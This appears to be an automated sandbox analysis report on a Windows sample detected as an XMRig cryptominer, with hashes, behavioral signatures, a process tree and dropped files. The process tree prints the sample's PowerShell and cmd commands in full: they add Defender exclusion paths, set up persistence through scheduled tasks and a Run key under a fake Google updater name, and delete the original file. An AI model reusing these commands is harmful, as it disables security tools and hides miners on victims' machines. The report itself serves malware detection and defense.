Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    360s
  • max time network
    1800s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/6aNn9vLJCQVfagSE.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1616
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\6aNn9vLJCQVfagSE.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:1664
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1080
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:1832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2644
    • C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      1⤵
      • Creates scheduled task(s)
      PID:2504
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2688
      • C:\Program Files\Google\Chrome\updater.exe
        "C:\Program Files\Google\Chrome\updater.exe"
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3000
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {DE4A840A-DAAA-41CA-AE99-594CC4B12DA2} S-1-5-18:NT AUTHORITY\System:Service:
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2528
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:2544
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          1⤵
          • Creates scheduled task(s)
          PID:2992

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          226KB

          MD5

          7e9a32036e8b1331249d3d33bae2cedc

          SHA1

          e6e34756cc0b1fe44ffd1d91a4d2282f54750973

          SHA256

          b9a03270e704500269b68206081d95f3f8f9bd50fbe860ebe7cd1c84b8404139

          SHA512

          ed5238586784a80b5337419f6b8c783667c90453a8e7135fcff6cacb347effc6a0065e4ff527f3efe411963c8c1c2dd78ca79d6ca9241054a8647702bc3b6361

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K7LOQCWMQL2BWNE81ZJS.temp
          Filesize

          7KB

          MD5

          172b26eaf7b41616bc6a79ff58e1e84f

          SHA1

          17d284800d52667295f3de738a0afc72a5d84b0e

          SHA256

          3f7cf9c4d77fc6d19ae31a2832706a750c7b7d0c24f3122ab04628de0f263944

          SHA512

          d1522ff253c968cfd1d85685bd5784ec732203daa6ccef696ed487fed13b7c0e12ee10289c75050e9df9067e7c9564482296420bf522af8dca7c96ecac090e30

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          9KB

          MD5

          b0bfa4a6ce2d9203147b7e5a32b0e818

          SHA1

          fe00782988483414ede86815c43488b650f6160b

          SHA256

          492909579ac7276ca652e6f455b2afe17d9e933cd2b2c31fb92e61023f28b41d

          SHA512

          bdc0c6294df334208469eb3f24d74363f29aaacc608832387667c94b36ec5c982fec1a71f8ede2430c17568db1a4b60538fde20d0cdc18b369254d18dd920a6f

        • memory/1616-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp
          Filesize

          512KB

        • memory/1616-12-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/1616-9-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/1616-10-0x0000000002AD0000-0x0000000002B50000-memory.dmp
          Filesize

          512KB

        • memory/1616-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp
          Filesize

          512KB

        • memory/1616-6-0x00000000022E0000-0x00000000022E8000-memory.dmp
          Filesize

          32KB

        • memory/1616-7-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/1616-5-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
          Filesize

          2.9MB

        • memory/1832-72-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1832-67-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1900-46-0x0000000000D70000-0x0000000000DF0000-memory.dmp
          Filesize

          512KB

        • memory/1900-43-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/1900-44-0x0000000000D70000-0x0000000000DF0000-memory.dmp
          Filesize

          512KB

        • memory/1900-47-0x0000000000D7B000-0x0000000000DE2000-memory.dmp
          Filesize

          412KB

        • memory/1900-48-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/1900-45-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2332-113-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-107-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-109-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-111-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-115-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-117-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-64-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-63-0x00000000001D0000-0x00000000001F0000-memory.dmp
          Filesize

          128KB

        • memory/2332-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-79-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-65-0x0000000000FA0000-0x0000000000FC0000-memory.dmp
          Filesize

          128KB

        • memory/2332-66-0x0000000000810000-0x0000000000830000-memory.dmp
          Filesize

          128KB

        • memory/2332-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-70-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-74-0x0000000000FA0000-0x0000000000FC0000-memory.dmp
          Filesize

          128KB

        • memory/2332-75-0x0000000000810000-0x0000000000830000-memory.dmp
          Filesize

          128KB

        • memory/2332-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2332-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2548-0-0x000000013F7E0000-0x000000013F9F1000-memory.dmp
          Filesize

          2.1MB

        • memory/2548-26-0x000000013F7E0000-0x000000013F9F1000-memory.dmp
          Filesize

          2.1MB

        • memory/2644-52-0x00000000014F0000-0x0000000001570000-memory.dmp
          Filesize

          512KB

        • memory/2644-50-0x00000000014F0000-0x0000000001570000-memory.dmp
          Filesize

          512KB

        • memory/2644-51-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-54-0x00000000014F0000-0x0000000001570000-memory.dmp
          Filesize

          512KB

        • memory/2644-49-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-55-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-53-0x00000000014F0000-0x0000000001570000-memory.dmp
          Filesize

          512KB

        • memory/2672-18-0x000000001B550000-0x000000001B832000-memory.dmp
          Filesize

          2.9MB

        • memory/2672-20-0x0000000002AD0000-0x0000000002B50000-memory.dmp
          Filesize

          512KB

        • memory/2672-19-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2672-21-0x00000000027D0000-0x00000000027D8000-memory.dmp
          Filesize

          32KB

        • memory/2672-24-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2672-22-0x000007FEF4E30000-0x000007FEF57CD000-memory.dmp
          Filesize

          9.6MB

        • memory/2672-23-0x0000000002AD0000-0x0000000002B50000-memory.dmp
          Filesize

          512KB

        • memory/2976-35-0x0000000002930000-0x00000000029B0000-memory.dmp
          Filesize

          512KB

        • memory/2976-33-0x0000000002930000-0x00000000029B0000-memory.dmp
          Filesize

          512KB

        • memory/2976-32-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2976-38-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/2976-37-0x0000000002930000-0x00000000029B0000-memory.dmp
          Filesize

          512KB

        • memory/2976-36-0x0000000002930000-0x00000000029B0000-memory.dmp
          Filesize

          512KB

        • memory/2976-34-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp
          Filesize

          9.6MB

        • memory/3000-42-0x000000013F850000-0x000000013FA61000-memory.dmp
          Filesize

          2.1MB

        • memory/3000-62-0x000000013F850000-0x000000013FA61000-memory.dmp
          Filesize

          2.1MB